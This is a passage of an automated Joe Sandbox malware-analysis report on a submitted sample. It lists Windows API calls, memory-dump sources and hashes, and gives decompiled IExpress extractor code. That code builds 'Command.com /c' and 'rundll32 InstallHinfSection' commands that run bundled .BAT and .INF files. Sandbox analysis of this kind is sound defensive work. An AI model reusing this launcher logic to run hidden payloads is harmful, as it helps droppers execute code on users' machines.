                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00E78C42), ref: 00E73D8F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00E73E26
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00E78C42), ref: 00E73EFF
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00E78C42), ref: 00E73F1F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00E78C42), ref: 00E73F40
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00E78C42), ref: 00E73F47
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00E78C42), ref: 00E73F76
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00E78C42), ref: 00E73F80
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00E78C42), ref: 00E73FC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                      • API String ID: 1032054927-3575165364
                                                                                                                                                                                                      • Opcode ID: 0df38305e6155e7502653e06b27b9e2aabd50920f0e0d5d8e79dd0fa2c4ecf6a
                                                                                                                                                                                                      • Instruction ID: 780b77d96eff8d663fcf700744c6b5c7a2ea4928dde76e5a019560473b3163f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0df38305e6155e7502653e06b27b9e2aabd50920f0e0d5d8e79dd0fa2c4ecf6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54B1F3706083419FD3B4DF358845BAB76E4EB84744F10A92EFA8DF21E1DB708989E752
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 141 e71ae8-e71b2c call e71680 144 e71b2e-e71b39 141->144 145 e71b3b-e71b40 141->145 146 e71b46-e71b61 call e71a84 144->146 145->146 149 e71b63-e71b65 146->149 150 e71b9f-e71bc2 call e71781 call e7658a 146->150 152 e71b68-e71b6d 149->152 159 e71bc7-e71bd3 call e766c8 150->159 152->152 153 e71b6f-e71b74 152->153 153->150 155 e71b76-e71b7b 153->155 157 e71b83-e71b86 155->157 158 e71b7d-e71b81 155->158 157->150 161 e71b88-e71b8a 157->161 158->157 160 e71b8c-e71b9d call e71680 158->160 166 e71d73-e71d7f call e766c8 159->166 167 e71bd9-e71bf1 CompareStringA 159->167 160->159 161->150 161->160 174 e71d81-e71d99 CompareStringA 166->174 175 e71df8-e71e09 LocalAlloc 166->175 167->166 168 e71bf7-e71c07 GetFileAttributesA 167->168 170 e71d53-e71d5e 168->170 171 e71c0d-e71c15 168->171 176 e71d64-e71d6e call e744b9 170->176 171->170 173 e71c1b-e71c33 call e71a84 171->173 189 e71c35-e71c38 173->189 190 e71c50-e71c61 LocalAlloc 173->190 174->175 178 e71d9b-e71da2 174->178 179 e71dd4-e71ddf 175->179 180 e71e0b-e71e1b GetFileAttributesA 175->180 188 e71e94-e71ea4 call e76ce0 176->188 183 e71da5-e71daa 178->183 179->176 184 e71e67-e71e73 call e71680 180->184 185 e71e1d-e71e1f 180->185 183->183 191 e71dac-e71db4 183->191 198 e71e78-e71e84 call e72aac 184->198 185->184 187 e71e21-e71e3e call e71781 185->187 187->198 207 e71e40-e71e43 187->207 194 e71c40-e71c4b call e71a84 189->194 195 e71c3a 189->195 190->179 197 e71c67-e71c72 190->197 196 e71db7-e71dbc 191->196 194->190 195->194 196->196 203 e71dbe-e71dd2 LocalAlloc 196->203 204 e71c74 197->204 205 e71c79-e71cc0 GetPrivateProfileIntA GetPrivateProfileStringA 197->205 211 e71e89-e71e92 198->211 203->179 208 e71de1-e71df3 call e7171e 203->208 204->205 209 e71cc2-e71ccc 205->209 210 e71cf8-e71d07 205->210 207->198 212 e71e45-e71e65 call e716b3 * 2 207->212 208->211 216 e71cd3-e71cf3 call e71680 * 2 209->216 217 e71cce 209->217 213 e71d23 210->213 214 e71d09-e71d21 GetShortPathNameA 210->214 211->188 212->198 220 e71d28-e71d2b 213->220 214->220 216->211 217->216 224 e71d32-e71d4e call e7171e 220->224 225 e71d2d 220->225 224->211 225->224
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00E71AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                      				CHAR** _v1564;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				CHAR* _t53;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				char* _t57;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				CHAR* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				signed char _t65;
                                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                                      				CHAR* _t90;
                                                                                                                                                                                                      				CHAR* _t92;
                                                                                                                                                                                                      				char _t105;
                                                                                                                                                                                                      				char _t106;
                                                                                                                                                                                                      				CHAR** _t111;
                                                                                                                                                                                                      				CHAR* _t115;
                                                                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                      				CHAR* _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				void* _t138;
                                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				intOrPtr* _t146;
                                                                                                                                                                                                      				char* _t148;
                                                                                                                                                                                                      				CHAR* _t151;
                                                                                                                                                                                                      				void* _t152;
                                                                                                                                                                                                      				CHAR* _t155;
                                                                                                                                                                                                      				CHAR* _t156;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t48 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                      				_t108 = __ecx;
                                                                                                                                                                                                      				_v1564 = _a4;
                                                                                                                                                                                                      				_v1560 = _a8;
                                                                                                                                                                                                      				E00E71680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                      				if(_v528 != 0x22) {
                                                                                                                                                                                                      					_t135 = " ";
                                                                                                                                                                                                      					_t53 =  &_v528;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t135 = "\"";
                                                                                                                                                                                                      					_t53 =  &_v527;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t111 =  &_v1556;
                                                                                                                                                                                                      				_v1556 = _t53;
                                                                                                                                                                                                      				_t54 = E00E71A84(_t111, _t135);
                                                                                                                                                                                                      				_t156 = _v1556;
                                                                                                                                                                                                      				_t151 = _t54;
                                                                                                                                                                                                      				if(_t156 == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_push(_t111);
                                                                                                                                                                                                      					E00E71781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      					E00E7658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t132 = _t156;
                                                                                                                                                                                                      					_t148 =  &(_t132[1]);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t105 =  *_t132;
                                                                                                                                                                                                      						_t132 =  &(_t132[1]);
                                                                                                                                                                                                      					} while (_t105 != 0);
                                                                                                                                                                                                      					_t111 = _t132 - _t148;
                                                                                                                                                                                                      					if(_t111 < 3) {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t106 = _t156[1];
                                                                                                                                                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						E00E71680( &_v268, 0x104, _t156);
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t138 = 0x2e;
                                                                                                                                                                                                      						_t57 = E00E766C8(_t156, _t138);
                                                                                                                                                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                      							_t139 = 0x2e;
                                                                                                                                                                                                      							_t115 = _t156;
                                                                                                                                                                                                      							_t58 = E00E766C8(_t115, _t139);
                                                                                                                                                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									goto L43;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                      									E00E71680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_push(_t115);
                                                                                                                                                                                                      									_t108 = 0x400;
                                                                                                                                                                                                      									E00E71781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                      										E00E716B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                      										E00E716B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = _t156;
                                                                                                                                                                                                      								 *_t156 = 0;
                                                                                                                                                                                                      								E00E72AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                      								goto L53;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t108 = "Command.com /c %s";
                                                                                                                                                                                                      								_t125 = "Command.com /c %s";
                                                                                                                                                                                                      								_t145 = _t125 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t76 =  *_t125;
                                                                                                                                                                                                      									_t125 = _t125 + 1;
                                                                                                                                                                                                      								} while (_t76 != 0);
                                                                                                                                                                                                      								_t126 = _t125 - _t145;
                                                                                                                                                                                                      								_t146 =  &_v268;
                                                                                                                                                                                                      								_t157 = _t146 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t77 =  *_t146;
                                                                                                                                                                                                      									_t146 = _t146 + 1;
                                                                                                                                                                                                      								} while (_t77 != 0);
                                                                                                                                                                                                      								_t140 = _t146 - _t157;
                                                                                                                                                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                      								if(_t156 != 0) {
                                                                                                                                                                                                      									E00E7171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                      									goto L53;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L43;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t140 = 0x525;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t60 =  &_v268;
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t140 = "[";
                                                                                                                                                                                                      								_v1556 = _t151;
                                                                                                                                                                                                      								_t90 = E00E71A84( &_v1556, "[");
                                                                                                                                                                                                      								if(_t90 != 0) {
                                                                                                                                                                                                      									if( *_t90 != 0) {
                                                                                                                                                                                                      										_v1556 = _t90;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "]";
                                                                                                                                                                                                      									E00E71A84( &_v1556, "]");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									L43:
                                                                                                                                                                                                      									_t60 = 0;
                                                                                                                                                                                                      									_t140 = 0x4b5;
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									_push(0x10);
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									L35:
                                                                                                                                                                                                      									_push(_t60);
                                                                                                                                                                                                      									E00E744B9(0, _t140);
                                                                                                                                                                                                      									_t62 = 0;
                                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t155 = _v1556;
                                                                                                                                                                                                      									_t92 = _t155;
                                                                                                                                                                                                      									if( *_t155 == 0) {
                                                                                                                                                                                                      										_t92 = "DefaultInstall";
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *0xe79120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                      									 *_v1560 = 1;
                                                                                                                                                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xe71140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                      										 *0xe79a34 =  *0xe79a34 & 0xfffffffb;
                                                                                                                                                                                                      										if( *0xe79a40 != 0) {
                                                                                                                                                                                                      											_t108 = "setupapi.dll";
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t108 = "setupx.dll";
                                                                                                                                                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push( &_v268);
                                                                                                                                                                                                      										_push(_t155);
                                                                                                                                                                                                      										E00E7171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *0xe79a34 =  *0xe79a34 | 0x00000004;
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										E00E71680(_t108, 0x104, _t155);
                                                                                                                                                                                                      										_t140 = 0x200;
                                                                                                                                                                                                      										E00E71680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L53:
                                                                                                                                                                                                      									_t62 = 1;
                                                                                                                                                                                                      									 *_v1564 = _t156;
                                                                                                                                                                                                      									L54:
                                                                                                                                                                                                      									_pop(_t152);
                                                                                                                                                                                                      									return E00E76CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}














































                                                                                                                                                                                                      0x00e71af3
                                                                                                                                                                                                      0x00e71afa
                                                                                                                                                                                                      0x00e71b07
                                                                                                                                                                                                      0x00e71b09
                                                                                                                                                                                                      0x00e71b1a
                                                                                                                                                                                                      0x00e71b20
                                                                                                                                                                                                      0x00e71b2c
                                                                                                                                                                                                      0x00e71b3b
                                                                                                                                                                                                      0x00e71b40
                                                                                                                                                                                                      0x00e71b2e
                                                                                                                                                                                                      0x00e71b2e
                                                                                                                                                                                                      0x00e71b33
                                                                                                                                                                                                      0x00e71b33
                                                                                                                                                                                                      0x00e71b46
                                                                                                                                                                                                      0x00e71b4c
                                                                                                                                                                                                      0x00e71b52
                                                                                                                                                                                                      0x00e71b57
                                                                                                                                                                                                      0x00e71b5d
                                                                                                                                                                                                      0x00e71b61
                                                                                                                                                                                                      0x00e71b9f
                                                                                                                                                                                                      0x00e71b9f
                                                                                                                                                                                                      0x00e71bb1
                                                                                                                                                                                                      0x00e71bc2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71b63
                                                                                                                                                                                                      0x00e71b63
                                                                                                                                                                                                      0x00e71b65
                                                                                                                                                                                                      0x00e71b68
                                                                                                                                                                                                      0x00e71b68
                                                                                                                                                                                                      0x00e71b6a
                                                                                                                                                                                                      0x00e71b6b
                                                                                                                                                                                                      0x00e71b6f
                                                                                                                                                                                                      0x00e71b74
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71b76
                                                                                                                                                                                                      0x00e71b7b
                                                                                                                                                                                                      0x00e71b86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71b8c
                                                                                                                                                                                                      0x00e71b8c
                                                                                                                                                                                                      0x00e71b98
                                                                                                                                                                                                      0x00e71bc7
                                                                                                                                                                                                      0x00e71bc9
                                                                                                                                                                                                      0x00e71bcc
                                                                                                                                                                                                      0x00e71bd3
                                                                                                                                                                                                      0x00e71d75
                                                                                                                                                                                                      0x00e71d76
                                                                                                                                                                                                      0x00e71d78
                                                                                                                                                                                                      0x00e71d7f
                                                                                                                                                                                                      0x00e71e05
                                                                                                                                                                                                      0x00e71e09
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71e12
                                                                                                                                                                                                      0x00e71e1b
                                                                                                                                                                                                      0x00e71e73
                                                                                                                                                                                                      0x00e71e21
                                                                                                                                                                                                      0x00e71e21
                                                                                                                                                                                                      0x00e71e28
                                                                                                                                                                                                      0x00e71e37
                                                                                                                                                                                                      0x00e71e3e
                                                                                                                                                                                                      0x00e71e52
                                                                                                                                                                                                      0x00e71e60
                                                                                                                                                                                                      0x00e71e60
                                                                                                                                                                                                      0x00e71e3e
                                                                                                                                                                                                      0x00e71e79
                                                                                                                                                                                                      0x00e71e7b
                                                                                                                                                                                                      0x00e71e84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71d9b
                                                                                                                                                                                                      0x00e71d9b
                                                                                                                                                                                                      0x00e71da0
                                                                                                                                                                                                      0x00e71da2
                                                                                                                                                                                                      0x00e71da5
                                                                                                                                                                                                      0x00e71da5
                                                                                                                                                                                                      0x00e71da7
                                                                                                                                                                                                      0x00e71da8
                                                                                                                                                                                                      0x00e71dac
                                                                                                                                                                                                      0x00e71dae
                                                                                                                                                                                                      0x00e71db4
                                                                                                                                                                                                      0x00e71db7
                                                                                                                                                                                                      0x00e71db7
                                                                                                                                                                                                      0x00e71db9
                                                                                                                                                                                                      0x00e71dba
                                                                                                                                                                                                      0x00e71dbe
                                                                                                                                                                                                      0x00e71dc3
                                                                                                                                                                                                      0x00e71dce
                                                                                                                                                                                                      0x00e71dd2
                                                                                                                                                                                                      0x00e71deb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71df0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71dd2
                                                                                                                                                                                                      0x00e71bf7
                                                                                                                                                                                                      0x00e71bfe
                                                                                                                                                                                                      0x00e71c07
                                                                                                                                                                                                      0x00e71d55
                                                                                                                                                                                                      0x00e71d5a
                                                                                                                                                                                                      0x00e71d5b
                                                                                                                                                                                                      0x00e71d5d
                                                                                                                                                                                                      0x00e71d5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71c1b
                                                                                                                                                                                                      0x00e71c1b
                                                                                                                                                                                                      0x00e71c20
                                                                                                                                                                                                      0x00e71c2c
                                                                                                                                                                                                      0x00e71c33
                                                                                                                                                                                                      0x00e71c38
                                                                                                                                                                                                      0x00e71c3a
                                                                                                                                                                                                      0x00e71c3a
                                                                                                                                                                                                      0x00e71c40
                                                                                                                                                                                                      0x00e71c4b
                                                                                                                                                                                                      0x00e71c4b
                                                                                                                                                                                                      0x00e71c5d
                                                                                                                                                                                                      0x00e71c61
                                                                                                                                                                                                      0x00e71dd4
                                                                                                                                                                                                      0x00e71dd4
                                                                                                                                                                                                      0x00e71dd6
                                                                                                                                                                                                      0x00e71ddb
                                                                                                                                                                                                      0x00e71ddc
                                                                                                                                                                                                      0x00e71dde
                                                                                                                                                                                                      0x00e71d64
                                                                                                                                                                                                      0x00e71d64
                                                                                                                                                                                                      0x00e71d67
                                                                                                                                                                                                      0x00e71d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e71c67
                                                                                                                                                                                                      0x00e71c67
                                                                                                                                                                                                      0x00e71c6d
                                                                                                                                                                                                      0x00e71c72
                                                                                                                                                                                                      0x00e71c74
                                                                                                                                                                                                      0x00e71c74
                                                                                                                                                                                                      0x00e71c8e
                                                                                                                                                                                                      0x00e71c99
                                                                                                                                                                                                      0x00e71cc0
                                                                                                                                                                                                      0x00e71cf8
                                                                                                                                                                                                      0x00e71d07
                                                                                                                                                                                                      0x00e71d23
                                                                                                                                                                                                      0x00e71d09
                                                                                                                                                                                                      0x00e71d14
                                                                                                                                                                                                      0x00e71d1b
                                                                                                                                                                                                      0x00e71d1b
                                                                                                                                                                                                      0x00e71d2b
                                                                                                                                                                                                      0x00e71d2d
                                                                                                                                                                                                      0x00e71d2d
                                                                                                                                                                                                      0x00e71d38
                                                                                                                                                                                                      0x00e71d39
                                                                                                                                                                                                      0x00e71d46
                                                                                                                                                                                                      0x00e71cc2
                                                                                                                                                                                                      0x00e71cc2
                                                                                                                                                                                                      0x00e71ccc
                                                                                                                                                                                                      0x00e71cce
                                                                                                                                                                                                      0x00e71cce
                                                                                                                                                                                                      0x00e71cdb
                                                                                                                                                                                                      0x00e71ce6
                                                                                                                                                                                                      0x00e71cee
                                                                                                                                                                                                      0x00e71cee
                                                                                                                                                                                                      0x00e71e89
                                                                                                                                                                                                      0x00e71e91
                                                                                                                                                                                                      0x00e71e92
                                                                                                                                                                                                      0x00e71e94
                                                                                                                                                                                                      0x00e71e97
                                                                                                                                                                                                      0x00e71ea4
                                                                                                                                                                                                      0x00e71ea4
                                                                                                                                                                                                      0x00e71c61
                                                                                                                                                                                                      0x00e71c07
                                                                                                                                                                                                      0x00e71bd3
                                                                                                                                                                                                      0x00e71b7b

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E71BE7
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E71BFE
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E71C57
                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00E71C88
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00E71140,00000000,00000008,?), ref: 00E71CB8
                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32 ref: 00E71D1B
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                      • API String ID: 383838535-472070384
                                                                                                                                                                                                      • Opcode ID: bb6d5dc567341b04da6dcb0ae10c19bca90e8703b3204fa744c900de7db8bf6c
                                                                                                                                                                                                      • Instruction ID: ba157e6db8b259b1d31b8467613aa648bc1aff40af547933d0f2b054c7aa9e02
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb6d5dc567341b04da6dcb0ae10c19bca90e8703b3204fa744c900de7db8bf6c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42A10670A003149BEB20DB2CCC45BEA77A9DB91314F14E2E5E55DB72C1DBB09E89CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
